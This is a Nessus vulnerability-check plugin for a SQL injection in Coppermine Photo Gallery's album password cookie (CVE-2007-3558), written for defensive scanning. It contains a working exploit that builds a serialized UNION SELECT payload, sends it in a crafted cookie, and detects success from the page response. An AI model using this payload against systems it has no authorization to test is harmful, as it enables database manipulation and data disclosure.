#
# (C) Tenable Network Security, Inc.
#


if (description)
{
  script_id(31137);
  script_version("$Revision: 1.2 $");

  script_cve_id("CVE-2007-3558");
  script_bugtraq_id(24710, 27372);
  script_xref(name:"milw0rm", value:"4950");
  script_xref(name:"milw0rm", value:"4961");
  script_xref(name:"Secunia", value:"25846");

  script_name(english:"Coppermine Photo Gallery Album Password Cookie SQL Injection Vulnerability");
  script_summary(english:"Tries to generate a SQL error");

  desc = "
Synopsis :

The remote web server contains a PHP application that is prone to a
SQL injection attack. 

Description : 

The version of Coppermine installed on the remote host fails to
sanitize user-supplied input to the album password cookie before using
it in a database query in the 'get_private_album_set' function in
'include/functions.inc.php'.  Regardless of PHP's 'magic_quotes_gpc'
setting, an attacker may be able to exploit this issue to manipulate
database queries, leading to disclosure of sensitive information,
execution of arbitrary code, or attacks against the underlying
database. 

See also :

http://coppermine-gallery.net/forum/index.php?topic=44845.0

Solution :

Upgrade to Coppermine 1.4.11 or later.

Risk factor :

High / CVSS Base Score : 7.5
(CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)";
  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2008 Tenable Network Security, Inc.");

  script_dependencies("coppermine_gallery_detect.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("url_func.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);


# Test an install.
install = get_kb_item(string("www/", port, "/coppermine_photo_gallery"));
if (isnull(install)) exit(0);
matches = eregmatch(string:install, pattern:"^(.+) under (/.*)$");
if (!isnull(matches))
{
  dir = matches[2];
  url = string(dir, "/index.php");

  # Find a public album and the cookie.
  req = http_get(item:url, port:port);
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
  if (res == NULL) exit(0);

  aid = NULL;
  cookie_prefix = NULL;

  pat = 'thumbnails.php\\?album=([0-9]+)';
  matches = egrep(pattern:pat, string:res);
  if (matches)
  {
    foreach match (split(matches))
    {
      match = chomp(match);
      item = eregmatch(pattern:pat, string:match);
      if (!isnull(item))
      {
        aid = item[1];
        break;
      }
    }
  }

  pat = '^Set-Cookie:.* ([^ ]+)_data=';
  matches = egrep(pattern:pat, string:res);
  if (matches)
  {
    foreach match (split(matches))
    {
      match = chomp(match);
      item = eregmatch(pattern:pat, string:match);
      if (!isnull(item))
      {
        cookie_prefix = item[1];
        break;
      }
    }
  }


  # Try to exploit the vulnerability to make the album appear in FORBIDDEN_SET
  # so we won't see it.
  if (isnull(aid) || isnull(cookie_prefix))
  {
    if (log_verbosity > 1)
    {
      if (isnull(aid)) debug_print("couldn't find an album to use!", level:0);
      if (isnull(cookie_prefix)) debug_print("couldn't find the cookie prefix!", level:0);
    }
  }
  else
  {
    h = hexstr(string(aid, ") UNION SELECT ", aid, " LIMIT 99999999/*"));
    magic = string(rand());
    sql1 = string(aid, ") UNION SELECT 0x", h, ",", magic, " LIMIT 1,1/*");
    sql2 = string(aid, ") UNION SELECT 0x", h, ",", magic, " /*");
    exploit = string(
      'a:2:{',
        's:', strlen(sql1), ':"', sql1, '";s:6:"nessus";',
        's:', strlen(sql2), ':"', sql2, '";s:', strlen(magic), ':"', magic, '";',
      '}'
    );

    req2 = str_replace(
      string:req,
      find:"User-Agent:",
      replace:string(
        "Cookie: ", cookie_prefix, "_albpw=", urlencode(str:exploit), "\r\n",
        "User-Agent:"
      )
    );
    res2 = http_keepalive_send_recv(port:port, data:req2, bodyonly:TRUE);
    if (res2 == NULL) exit(0);

    # If we don't see the album this time...
    if (
      "<!-- Start standard table" >< res2 &&
      string("thumbnails.php?album=", aid) >!< res2
    )
    {
      # Unless we're being paranoid, get the list again to be sure the
      # album wasn't just deleted.
      vuln = FALSE;
      if (report_paranoia < 2)
      {
        res3 = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
        if (res3 == NULL) exit(0);

        if (string("thumbnails.php?album=", aid) >< res3) vuln = TRUE;
      }
      else vuln = TRUE;

      if (vuln)
      {
        security_hole(port);
        exit(0);
      }
    }
  }
}
